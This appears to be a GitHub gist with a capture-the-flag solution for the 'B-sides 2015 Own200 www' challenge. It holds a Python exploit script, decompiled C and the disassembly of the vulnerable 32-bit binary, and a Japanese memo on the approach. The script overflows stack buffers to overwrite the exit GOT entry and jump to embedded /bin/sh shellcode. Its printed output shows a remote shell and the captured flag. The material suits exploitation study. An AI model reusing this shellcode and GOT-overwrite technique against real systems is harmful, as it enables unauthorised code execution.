Skip to content

Instantly share code, notes, and snippets.

@hhc0null

hhc0null/exploit.py

Last active August 29, 2015 14:17
Show Gist options
  • Save hhc0null/9a2ad162cdb0567100e3 to your computer and use it in GitHub Desktop.
Save hhc0null/9a2ad162cdb0567100e3 to your computer and use it in GitHub Desktop.
Download ZIP
B-sides 2015 Own200 www
Raw
exploit.py
#!/usr/bin/env python2
import binascii
import re
import socket
import struct
import sys
import telnetlib
import time
def read_until(f, delim='\n'):
data = ""
while not data.endswith(delim):
data += f.read(1)
return data
def connect(rhp=("localhost", 10001)):
s = socket.create_connection(rhp)
f = s.makefile('rw', bufsize=0)
return s, f
def interact(s):
t = telnetlib.Telnet()
t.sock = s
print "[+] 4ll y0U n33D 15 5h3ll!!"
t.interact()
def p(x, t="<I"):
return struct.pack(t, x)
def u(x, t="<I"):
return struct.unpack(t, x)[0]
def unsigned(x):
return u(p(x, t="<h"), t="<H")
def overwrite(pairs, index=7):
(addrs, datas) = pairs
if len(addrs) != len(datas):
sys.stderr.write("[!] number of `pairs', elements don't be matched in overwrite()\n")
return ""
payload = ""
for addr in addrs:
# A, A+2, B, B+2, C, C+2, ...
payload += p(addr) + p(addr+2)
dataset = map(lambda x: [x&0xffff, (x>>16)&0xffff], datas)
dataset = sum(dataset, []) # it's a cool technique ;)
num = -len(payload)
prev = 0
for i, data in enumerate(dataset):
data += num
data = unsigned(data) if data < 0 else u(p(data, t="<H"), t="<H")
payload += "%{}x%{}$hn%{}x".format(data, index+i, (0x10000 - data + num) % 0x10000)
num = 0
return payload
def message(message_type, message_body, value=None):
text = ""
if value:
text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
else:
text = "[{}] {}".format(message_type, message_body)
print text
# etc
dummy_address = 0xdeadbeef
debug_mark = 0xdeadbabe
rhp = ("www.termsec.net", 17284)
#rhp = ("localhost", 17284)
www_got_exit = 0x8049d10
sock, io = connect(rhp)
read_until(io, delim="at ")
# get address of arg0
addr_arg0 = int(io.read(10), 16)
message("+", "arg0 address", addr_arg0)
read_until(io, delim="and ")
# get address of arg1
addr_arg1 = int(io.read(10), 16)
message("+", "arg1 address", addr_arg1)
read_until(io)
# overwrite arg0 address to exit GOT entry and fix address of arg1(www uses fgets).
arg0 = ""
arg0 += p(dummy_address)*4 # ebp_25h
arg0 += "A"*9 # ebp_15h
arg0 += p(dummy_address)*3 # from ebp_0ch to ebp_00h
arg0 += p(dummy_address) # saved ebp
arg0 += p(dummy_address) # saved eip
arg0 += p(www_got_exit) # arg0
arg0 += p(addr_arg1) # arg1
# address of shellcode and shellcode
arg1 = ""
arg1 += p(addr_arg1+4)
arg1 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
payload = ""
payload += arg0 + '\n'
payload += arg1 + '\n'
io.write(payload)
# intaractive mode
interact(sock)
"""
$ ./exploit.py
[+] arg0 address: 0xbfc44f64
[+] arg1 address: 0xbfc44e64
[+] 4ll y0U n33D 15 5h3ll!!
ᆳޯޯޯAAAAAAAAAᆳޯޯޯޯdNĿ
hNĿ1Ph//shh/binPS
ls
/bin//sh: 1: ls: not found
ls
/bin//sh: 2: ls: not found
echo *
bin challenge dev flag.txt lib
cat flag.txt
flag{K33P_ST4T1C_L1K3_W00L_F4BR1C}
*** Connection closed by remote host ***
"""
Raw
www.c
unsigned int bss_8049d68h = 0;
void copybuf(char *arg0, char *arg1)
{
// Local variables.
char ebp_25h[0x10];
char ebp_15h[9];
int ebp_0ch;
// XXX: we can overwrite arg0 and arg1.
strncpy(ebp_15h, bss_8049d68h, 9);
strcpy(ebp_25h, arg0);
// GOT overwrite!
strcpy(arg0, arg1);
ebp_0ch = strcmp(ebp_15h, bss_8049d68h);
if(ebp_0ch) {
puts("STACK SMASHING DETECTED!!! EXIT IMMEDIATELY");
exit(EXIT_SUCCESS);
}
}
int main()
{
// Local variables.
unsigned int esp_10h;
char esp_14h[0x100];
char esp_114h[0x100];
int esp_214h;
char *esp_218h;
int esp_21ch;
esp_218h = "Welcome to www! Please give me two strings to have them echoed back to you."
printf("%s\nbuffers at %p and %p, ready for input!\n", esp_218h, esp_114h, esp_14h);
fflush(stdout);
fgets(esp_114h, 0x100, stdin);
fgets(esp_14h, 0x100, stdin);
printf("%s\n%s\n", esp_114h, esp_14h);
fflush(stdout);
esp_214h = open("/dev/urandom", O_RDONLY);
if(esp_214h != 0) {
read(esp_214h, esp_10h, 4);
close(esp_214h);
srand(esp_10h);
} else {
puts("Unable to access /dev/urandom");
srand(time(NULL));
}
for(esp_21ch = 0; esp_21ch < 0x8; esp_21ch++) {
bss_8049d68h[esp_21ch] = (char)(rand() % 9 + '0');
}
bss_8049d68h[8] = '\0';
printf("Stack canary created: %s\n", bss_8049d68h);
copybuf(esp_114h, esp_14h);
puts("Better luck next time, eh?");
return 0;
}
Raw
www.disas
www-6c895cf622477d1bd2969ddbdf7c64185db9a41e: file format elf32-i386
Disassembly of section .init:
08048518 <_init>:
8048518: 55 push %ebp
8048519: 89 e5 mov %esp,%ebp
804851b: 53 push %ebx
804851c: 83 ec 04 sub $0x4,%esp
804851f: e8 00 00 00 00 call 8048524 <_init+0xc>
8048524: 5b pop %ebx
8048525: 81 c3 bc 17 00 00 add $0x17bc,%ebx
804852b: 8b 93 fc ff ff ff mov -0x4(%ebx),%edx
8048531: 85 d2 test %edx,%edx
8048533: 74 05 je 804853a <_init+0x22>
8048535: e8 96 00 00 00 call 80485d0 <__gmon_start__@plt>
804853a: 58 pop %eax
804853b: 5b pop %ebx
804853c: c9 leave
804853d: c3 ret
Disassembly of section .plt:
08048540 <strcmp@plt-0x10>:
8048540: ff 35 e4 9c 04 08 pushl 0x8049ce4
8048546: ff 25 e8 9c 04 08 jmp *0x8049ce8
804854c: 00 00 add %al,(%eax)
...
08048550 <strcmp@plt>:
8048550: ff 25 ec 9c 04 08 jmp *0x8049cec
8048556: 68 00 00 00 00 push $0x0
804855b: e9 e0 ff ff ff jmp 8048540 <_init+0x28>
08048560 <read@plt>:
8048560: ff 25 f0 9c 04 08 jmp *0x8049cf0
8048566: 68 08 00 00 00 push $0x8
804856b: e9 d0 ff ff ff jmp 8048540 <_init+0x28>
08048570 <printf@plt>:
8048570: ff 25 f4 9c 04 08 jmp *0x8049cf4
8048576: 68 10 00 00 00 push $0x10
804857b: e9 c0 ff ff ff jmp 8048540 <_init+0x28>
08048580 <fflush@plt>:
8048580: ff 25 f8 9c 04 08 jmp *0x8049cf8
8048586: 68 18 00 00 00 push $0x18
804858b: e9 b0 ff ff ff jmp 8048540 <_init+0x28>
08048590 <fgets@plt>:
8048590: ff 25 fc 9c 04 08 jmp *0x8049cfc
8048596: 68 20 00 00 00 push $0x20
804859b: e9 a0 ff ff ff jmp 8048540 <_init+0x28>
080485a0 <time@plt>:
80485a0: ff 25 00 9d 04 08 jmp *0x8049d00
80485a6: 68 28 00 00 00 push $0x28
80485ab: e9 90 ff ff ff jmp 8048540 <_init+0x28>
080485b0 <strcpy@plt>:
80485b0: ff 25 04 9d 04 08 jmp *0x8049d04
80485b6: 68 30 00 00 00 push $0x30
80485bb: e9 80 ff ff ff jmp 8048540 <_init+0x28>
080485c0 <puts@plt>:
80485c0: ff 25 08 9d 04 08 jmp *0x8049d08
80485c6: 68 38 00 00 00 push $0x38
80485cb: e9 70 ff ff ff jmp 8048540 <_init+0x28>
080485d0 <__gmon_start__@plt>:
80485d0: ff 25 0c 9d 04 08 jmp *0x8049d0c
80485d6: 68 40 00 00 00 push $0x40
80485db: e9 60 ff ff ff jmp 8048540 <_init+0x28>
080485e0 <exit@plt>:
80485e0: ff 25 10 9d 04 08 jmp *0x8049d10
80485e6: 68 48 00 00 00 push $0x48
80485eb: e9 50 ff ff ff jmp 8048540 <_init+0x28>
080485f0 <open@plt>:
80485f0: ff 25 14 9d 04 08 jmp *0x8049d14
80485f6: 68 50 00 00 00 push $0x50
80485fb: e9 40 ff ff ff jmp 8048540 <_init+0x28>
08048600 <srand@plt>:
8048600: ff 25 18 9d 04 08 jmp *0x8049d18
8048606: 68 58 00 00 00 push $0x58
804860b: e9 30 ff ff ff jmp 8048540 <_init+0x28>
08048610 <__libc_start_main@plt>:
8048610: ff 25 1c 9d 04 08 jmp *0x8049d1c
8048616: 68 60 00 00 00 push $0x60
804861b: e9 20 ff ff ff jmp 8048540 <_init+0x28>
08048620 <strncpy@plt>:
8048620: ff 25 20 9d 04 08 jmp *0x8049d20
8048626: 68 68 00 00 00 push $0x68
804862b: e9 10 ff ff ff jmp 8048540 <_init+0x28>
08048630 <rand@plt>:
8048630: ff 25 24 9d 04 08 jmp *0x8049d24
8048636: 68 70 00 00 00 push $0x70
804863b: e9 00 ff ff ff jmp 8048540 <_init+0x28>
08048640 <close@plt>:
8048640: ff 25 28 9d 04 08 jmp *0x8049d28
8048646: 68 78 00 00 00 push $0x78
804864b: e9 f0 fe ff ff jmp 8048540 <_init+0x28>
Disassembly of section .text:
08048650 <_start>:
8048650: 31 ed xor %ebp,%ebp
8048652: 5e pop %esi
8048653: 89 e1 mov %esp,%ecx
8048655: 83 e4 f0 and $0xfffffff0,%esp
8048658: 50 push %eax
8048659: 54 push %esp
804865a: 52 push %edx
804865b: 68 a0 89 04 08 push $0x80489a0
8048660: 68 b0 89 04 08 push $0x80489b0
8048665: 51 push %ecx
8048666: 56 push %esi
8048667: 68 b7 87 04 08 push $0x80487b7
804866c: e8 9f ff ff ff call 8048610 <__libc_start_main@plt>
8048671: f4 hlt
8048672: 90 nop
8048673: 90 nop
8048674: 90 nop
8048675: 90 nop
8048676: 90 nop
8048677: 90 nop
8048678: 90 nop
8048679: 90 nop
804867a: 90 nop
804867b: 90 nop
804867c: 90 nop
804867d: 90 nop
804867e: 90 nop
804867f: 90 nop
08048680 <deregister_tm_clones>:
8048680: b8 37 9d 04 08 mov $0x8049d37,%eax
8048685: 2d 34 9d 04 08 sub $0x8049d34,%eax
804868a: 83 f8 06 cmp $0x6,%eax
804868d: 77 02 ja 8048691 <deregister_tm_clones+0x11>
804868f: f3 c3 repz ret
8048691: b8 00 00 00 00 mov $0x0,%eax
8048696: 85 c0 test %eax,%eax
8048698: 74 f5 je 804868f <deregister_tm_clones+0xf>
804869a: 55 push %ebp
804869b: 89 e5 mov %esp,%ebp
804869d: 83 ec 18 sub $0x18,%esp
80486a0: c7 04 24 34 9d 04 08 movl $0x8049d34,(%esp)
80486a7: ff d0 call *%eax
80486a9: c9 leave
80486aa: c3 ret
80486ab: 90 nop
80486ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
080486b0 <register_tm_clones>:
80486b0: b8 34 9d 04 08 mov $0x8049d34,%eax
80486b5: 2d 34 9d 04 08 sub $0x8049d34,%eax
80486ba: c1 f8 02 sar $0x2,%eax
80486bd: 89 c2 mov %eax,%edx
80486bf: c1 ea 1f shr $0x1f,%edx
80486c2: 01 d0 add %edx,%eax
80486c4: d1 f8 sar %eax
80486c6: 75 02 jne 80486ca <register_tm_clones+0x1a>
80486c8: f3 c3 repz ret
80486ca: ba 00 00 00 00 mov $0x0,%edx
80486cf: 85 d2 test %edx,%edx
80486d1: 74 f5 je 80486c8 <register_tm_clones+0x18>
80486d3: 55 push %ebp
80486d4: 89 e5 mov %esp,%ebp
80486d6: 83 ec 18 sub $0x18,%esp
80486d9: 89 44 24 04 mov %eax,0x4(%esp)
80486dd: c7 04 24 34 9d 04 08 movl $0x8049d34,(%esp)
80486e4: ff d2 call *%edx
80486e6: c9 leave
80486e7: c3 ret
80486e8: 90 nop
80486e9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
080486f0 <__do_global_dtors_aux>:
80486f0: 80 3d 64 9d 04 08 00 cmpb $0x0,0x8049d64
80486f7: 75 13 jne 804870c <__do_global_dtors_aux+0x1c>
80486f9: 55 push %ebp
80486fa: 89 e5 mov %esp,%ebp
80486fc: 83 ec 08 sub $0x8,%esp
80486ff: e8 7c ff ff ff call 8048680 <deregister_tm_clones>
8048704: c6 05 64 9d 04 08 01 movb $0x1,0x8049d64
804870b: c9 leave
804870c: f3 c3 repz ret
804870e: 66 90 xchg %ax,%ax
08048710 <frame_dummy>:
8048710: a1 e8 9b 04 08 mov 0x8049be8,%eax
8048715: 85 c0 test %eax,%eax
8048717: 74 1e je 8048737 <frame_dummy+0x27>
8048719: b8 00 00 00 00 mov $0x0,%eax
804871e: 85 c0 test %eax,%eax
8048720: 74 15 je 8048737 <frame_dummy+0x27>
8048722: 55 push %ebp
8048723: 89 e5 mov %esp,%ebp
8048725: 83 ec 18 sub $0x18,%esp
8048728: c7 04 24 e8 9b 04 08 movl $0x8049be8,(%esp)
804872f: ff d0 call *%eax
8048731: c9 leave
8048732: e9 79 ff ff ff jmp 80486b0 <register_tm_clones>
8048737: e9 74 ff ff ff jmp 80486b0 <register_tm_clones>
0804873c <copybuf>:
void copybuf(char *arg0, char *arg1)
{
804873c: 55 push %ebp
804873d: 89 e5 mov %esp,%ebp
804873f: 83 ec 38 sub $0x38,%esp
// Local variables.
char ebp_25h[0x10];
char ebp_15h[9];
int ebp_0ch;
8048742: c7 44 24 08 09 00 00 movl $0x9,0x8(%esp)
8048749: 00
804874a: c7 44 24 04 68 9d 04 movl $0x8049d68,0x4(%esp)
8048751: 08
8048752: 8d 45 eb lea -0x15(%ebp),%eax
8048755: 89 04 24 mov %eax,(%esp)
8048758: e8 c3 fe ff ff call 8048620 <strncpy@plt>
strncpy(ebp_15h, bss_8049d68h, 9);
804875d: 8b 45 08 mov 0x8(%ebp),%eax
8048760: 89 44 24 04 mov %eax,0x4(%esp)
8048764: 8d 45 db lea -0x25(%ebp),%eax
8048767: 89 04 24 mov %eax,(%esp)
804876a: e8 41 fe ff ff call 80485b0 <strcpy@plt>
strcpy(ebp_25h, arg0);
804876f: 8b 45 0c mov 0xc(%ebp),%eax
8048772: 89 44 24 04 mov %eax,0x4(%esp)
8048776: 8b 45 08 mov 0x8(%ebp),%eax
8048779: 89 04 24 mov %eax,(%esp)
804877c: e8 2f fe ff ff call 80485b0 <strcpy@plt>
strcpy(arg0, arg1);
8048781: c7 44 24 04 68 9d 04 movl $0x8049d68,0x4(%esp)
8048788: 08
8048789: 8d 45 eb lea -0x15(%ebp),%eax
804878c: 89 04 24 mov %eax,(%esp)
804878f: e8 bc fd ff ff call 8048550 <strcmp@plt>
ebp_0ch = strcmp(ebp_15h, bss_8049d68h);
8048794: 89 45 f4 mov %eax,-0xc(%ebp)
8048797: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804879b: 74 18 je 80487b5 <copybuf+0x79>
if(!ebp_0ch) {
804879d: c7 04 24 30 8a 04 08 movl $0x8048a30,(%esp)
80487a4: e8 17 fe ff ff call 80485c0 <puts@plt>
puts("STACK SMASHING DETECTED!!! EXIT IMMEDIATELY");
80487a9: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80487b0: e8 2b fe ff ff call 80485e0 <exit@plt>
exit(EXIT_SUCCESS);
}
80487b5: c9 leave
80487b6: c3 ret
}
080487b7 <main>:
int main()
{
80487b7: 55 push %ebp
80487b8: 89 e5 mov %esp,%ebp
80487ba: 83 e4 f0 and $0xfffffff0,%esp
80487bd: 81 ec 20 02 00 00 sub $0x220,%esp
// Local variables.
unsigned int esp_10h;
char esp_14h[0x100];
char esp_114h[0x100];
int esp_214h;
char *esp_218h;
int esp_21ch;
80487c3: c7 84 24 18 02 00 00 movl $0x8048a5c,0x218(%esp)
80487ca: 5c 8a 04 08
esp_218h = "Welcome to www! Please give me two strings to have them echoed back to you."
80487ce: 8d 44 24 14 lea 0x14(%esp),%eax
80487d2: 89 44 24 0c mov %eax,0xc(%esp)
80487d6: 8d 84 24 14 01 00 00 lea 0x114(%esp),%eax
80487dd: 89 44 24 08 mov %eax,0x8(%esp)
80487e1: 8b 84 24 18 02 00 00 mov 0x218(%esp),%eax
80487e8: 89 44 24 04 mov %eax,0x4(%esp)
80487ec: c7 04 24 a8 8a 04 08 movl $0x8048aa8,(%esp)
80487f3: e8 78 fd ff ff call 8048570 <printf@plt>
printf("%s\nbuffers at %p and %p, ready for input!\n", esp_218h, esp_114h, esp_14h);
80487f8: a1 60 9d 04 08 mov 0x8049d60,%eax
80487fd: 89 04 24 mov %eax,(%esp)
8048800: e8 7b fd ff ff call 8048580 <fflush@plt>
fflush(stdout);
8048805: a1 40 9d 04 08 mov 0x8049d40,%eax
804880a: 89 44 24 08 mov %eax,0x8(%esp)
804880e: c7 44 24 04 00 01 00 movl $0x100,0x4(%esp)
8048815: 00
8048816: 8d 84 24 14 01 00 00 lea 0x114(%esp),%eax
804881d: 89 04 24 mov %eax,(%esp)
8048820: e8 6b fd ff ff call 8048590 <fgets@plt>
fgets(esp_114h, 0x100, stdin);
8048825: a1 40 9d 04 08 mov 0x8049d40,%eax
804882a: 89 44 24 08 mov %eax,0x8(%esp)
804882e: c7 44 24 04 00 01 00 movl $0x100,0x4(%esp)
8048835: 00
8048836: 8d 44 24 14 lea 0x14(%esp),%eax
804883a: 89 04 24 mov %eax,(%esp)
804883d: e8 4e fd ff ff call 8048590 <fgets@plt>
fgets(esp_14h, 0x100, stdin);
8048842: 8d 44 24 14 lea 0x14(%esp),%eax
8048846: 89 44 24 08 mov %eax,0x8(%esp)
804884a: 8d 84 24 14 01 00 00 lea 0x114(%esp),%eax
8048851: 89 44 24 04 mov %eax,0x4(%esp)
8048855: c7 04 24 d3 8a 04 08 movl $0x8048ad3,(%esp)
804885c: e8 0f fd ff ff call 8048570 <printf@plt>
printf("%s\n%s\n", esp_114h, esp_14h);
8048861: a1 60 9d 04 08 mov 0x8049d60,%eax
8048866: 89 04 24 mov %eax,(%esp)
8048869: e8 12 fd ff ff call 8048580 <fflush@plt>
fflush(stdout);
804886e: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048875: 00
8048876: c7 04 24 da 8a 04 08 movl $0x8048ada,(%esp)
804887d: e8 6e fd ff ff call 80485f0 <open@plt>
8048882: 89 84 24 14 02 00 00 mov %eax,0x214(%esp)
esp_214h = open("/dev/urandom", O_RDONLY);
8048889: 83 bc 24 14 02 00 00 cmpl $0x0,0x214(%esp)
8048890: 00
8048891: 74 3c je 80488cf <main+0x118>
if(esp_214h != 0) {
8048893: c7 44 24 08 04 00 00 movl $0x4,0x8(%esp)
804889a: 00
804889b: 8d 44 24 10 lea 0x10(%esp),%eax
804889f: 89 44 24 04 mov %eax,0x4(%esp)
80488a3: 8b 84 24 14 02 00 00 mov 0x214(%esp),%eax
80488aa: 89 04 24 mov %eax,(%esp)
80488ad: e8 ae fc ff ff call 8048560 <read@plt>
read(esp_214h, esp_10h, 4);
80488b2: 8b 84 24 14 02 00 00 mov 0x214(%esp),%eax
80488b9: 89 04 24 mov %eax,(%esp)
80488bc: e8 7f fd ff ff call 8048640 <close@plt>
close(esp_214h);
80488c1: 8b 44 24 10 mov 0x10(%esp),%eax
80488c5: 89 04 24 mov %eax,(%esp)
80488c8: e8 33 fd ff ff call 8048600 <srand@plt>
srand(esp_10h);
80488cd: eb 20 jmp 80488ef <main+0x138>
} else {
80488cf: c7 04 24 e7 8a 04 08 movl $0x8048ae7,(%esp)
80488d6: e8 e5 fc ff ff call 80485c0 <puts@plt>
puts("Unable to access /dev/urandom");
80488db: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80488e2: e8 b9 fc ff ff call 80485a0 <time@plt>
80488e7: 89 04 24 mov %eax,(%esp)
80488ea: e8 11 fd ff ff call 8048600 <srand@plt>
srand(time(NULL));
}
80488ef: c7 84 24 1c 02 00 00 movl $0x0,0x21c(%esp)
80488f6: 00 00 00 00
80488fa: c7 84 24 1c 02 00 00 movl $0x0,0x21c(%esp)
8048901: 00 00 00 00
8048905: eb 44 jmp 804894b <main+0x194>
for(esp_21ch = 0; esp_21ch < 0x8; esp_21ch++) {
8048907: e8 24 fd ff ff call 8048630 <rand@plt>
804890c: 89 c1 mov %eax,%ecx
804890e: ba 39 8e e3 38 mov $0x38e38e39,%edx
8048913: 89 c8 mov %ecx,%eax
8048915: f7 ea imul %edx
8048917: c1 fa 04 sar $0x4,%edx
804891a: 89 c8 mov %ecx,%eax
804891c: c1 f8 1f sar $0x1f,%eax
804891f: 29 c2 sub %eax,%edx
8048921: 89 d0 mov %edx,%eax
8048923: c1 e0 03 shl $0x3,%eax
8048926: 01 d0 add %edx,%eax
8048928: c1 e0 03 shl $0x3,%eax
804892b: 89 ca mov %ecx,%edx
804892d: 29 c2 sub %eax,%edx
804892f: 89 d0 mov %edx,%eax
8048931: 83 c0 30 add $0x30,%eax
8048934: 8b 94 24 1c 02 00 00 mov 0x21c(%esp),%edx
804893b: 81 c2 68 9d 04 08 add $0x8049d68,%edx
8048941: 88 02 mov %al,(%edx)
bss_8049d68h[esp_21ch] = (char)(rand() % 9 + '0');
8048943: 83 84 24 1c 02 00 00 addl $0x1,0x21c(%esp)
804894a: 01
// ->>
804894b: 83 bc 24 1c 02 00 00 cmpl $0x7,0x21c(%esp)
8048952: 07
8048953: 7e b2 jle 8048907 <main+0x150>
}
8048955: c6 05 70 9d 04 08 00 movb $0x0,0x8049d70
bss_8049d70h = 0;
804895c: c7 44 24 04 68 9d 04 movl $0x8049d68,0x4(%esp)
8048963: 08
8048964: c7 04 24 05 8b 04 08 movl $0x8048b05,(%esp)
804896b: e8 00 fc ff ff call 8048570 <printf@plt>
printf("Stack canary created: %s\n", bss_8049d68h);
8048970: 8d 44 24 14 lea 0x14(%esp),%eax
8048974: 89 44 24 04 mov %eax,0x4(%esp)
8048978: 8d 84 24 14 01 00 00 lea 0x114(%esp),%eax
804897f: 89 04 24 mov %eax,(%esp)
8048982: e8 b5 fd ff ff call 804873c <copybuf>
copybuf(esp_114h, esp_14h);
8048987: c7 04 24 1f 8b 04 08 movl $0x8048b1f,(%esp)
804898e: e8 2d fc ff ff call 80485c0 <puts@plt>
puts("Better luck next time, eh?");
8048993: b8 00 00 00 00 mov $0x0,%eax
8048998: c9 leave
8048999: c3 ret
return 0;
804899a: 90 nop
804899b: 90 nop
804899c: 90 nop
804899d: 90 nop
804899e: 90 nop
804899f: 90 nop
}
080489a0 <__libc_csu_fini>:
80489a0: 55 push %ebp
80489a1: 89 e5 mov %esp,%ebp
80489a3: 5d pop %ebp
80489a4: c3 ret
80489a5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80489a9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
080489b0 <__libc_csu_init>:
80489b0: 55 push %ebp
80489b1: 89 e5 mov %esp,%ebp
80489b3: 57 push %edi
80489b4: 56 push %esi
80489b5: 53 push %ebx
80489b6: e8 4f 00 00 00 call 8048a0a <__i686.get_pc_thunk.bx>
80489bb: 81 c3 25 13 00 00 add $0x1325,%ebx
80489c1: 83 ec 1c sub $0x1c,%esp
80489c4: e8 4f fb ff ff call 8048518 <_init>
80489c9: 8d bb 04 ff ff ff lea -0xfc(%ebx),%edi
80489cf: 8d 83 00 ff ff ff lea -0x100(%ebx),%eax
80489d5: 29 c7 sub %eax,%edi
80489d7: c1 ff 02 sar $0x2,%edi
80489da: 85 ff test %edi,%edi
80489dc: 74 24 je 8048a02 <__libc_csu_init+0x52>
80489de: 31 f6 xor %esi,%esi
80489e0: 8b 45 10 mov 0x10(%ebp),%eax
80489e3: 89 44 24 08 mov %eax,0x8(%esp)
80489e7: 8b 45 0c mov 0xc(%ebp),%eax
80489ea: 89 44 24 04 mov %eax,0x4(%esp)
80489ee: 8b 45 08 mov 0x8(%ebp),%eax
80489f1: 89 04 24 mov %eax,(%esp)
80489f4: ff 94 b3 00 ff ff ff call *-0x100(%ebx,%esi,4)
80489fb: 83 c6 01 add $0x1,%esi
80489fe: 39 fe cmp %edi,%esi
8048a00: 72 de jb 80489e0 <__libc_csu_init+0x30>
8048a02: 83 c4 1c add $0x1c,%esp
8048a05: 5b pop %ebx
8048a06: 5e pop %esi
8048a07: 5f pop %edi
8048a08: 5d pop %ebp
8048a09: c3 ret
08048a0a <__i686.get_pc_thunk.bx>:
8048a0a: 8b 1c 24 mov (%esp),%ebx
8048a0d: c3 ret
8048a0e: 90 nop
8048a0f: 90 nop
Disassembly of section .fini:
08048a10 <_fini>:
8048a10: 55 push %ebp
8048a11: 89 e5 mov %esp,%ebp
8048a13: 53 push %ebx
8048a14: 83 ec 04 sub $0x4,%esp
8048a17: e8 00 00 00 00 call 8048a1c <_fini+0xc>
8048a1c: 5b pop %ebx
8048a1d: 81 c3 c4 12 00 00 add $0x12c4,%ebx
8048a23: 59 pop %ecx
8048a24: 5b pop %ebx
8048a25: c9 leave
8048a26: c3 ret
Raw
www_memo.md

B-sides 2015 Own200 www

メモ

 copybufにはstrcpyが多用されており, 明らかにBoFが発生する.
 しかし, 0x8048758においてローカル変数にrandで生成したcanaryを配置し, 0x804878fのstrcmpでcanaryの検証を行っている.

解法

 このバイナリはNon NX, Non RELROなっているので, GOT overwriteとスタック内でのシェルコード実行が行える.
 copybufはebp+8@copybuf, ebp+12@copybufにそれぞれ第一引数, 第二引数を取る. そのため0x804876aのstrcpyでフレームを破壊することで引数を上書き可能となる. putsかexitのGOTのアドレスを第一引数として指定することで, 0x804876aのstrcpyでフレームを破壊しcopybufの第一引数としてputsかexitのGOTアドレスを指定できる.
 また0x80487f3においてesp+0x114@main, ebp+0x14@main(それぞれebp+8@copybuf, ebp+12@copybufに対応)のアドレスを示しているのでebp+0x14@mainを第二引数に指定し直すことができる.
 この場合において, 804877cのstrcpyを実行するとGOT overwriteをすることができる. ebp+0x14@mainにebp+0x18を, ebp+0x18@mainにシェルコードを置くことで, シェルコードへとeipを移すことができる.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment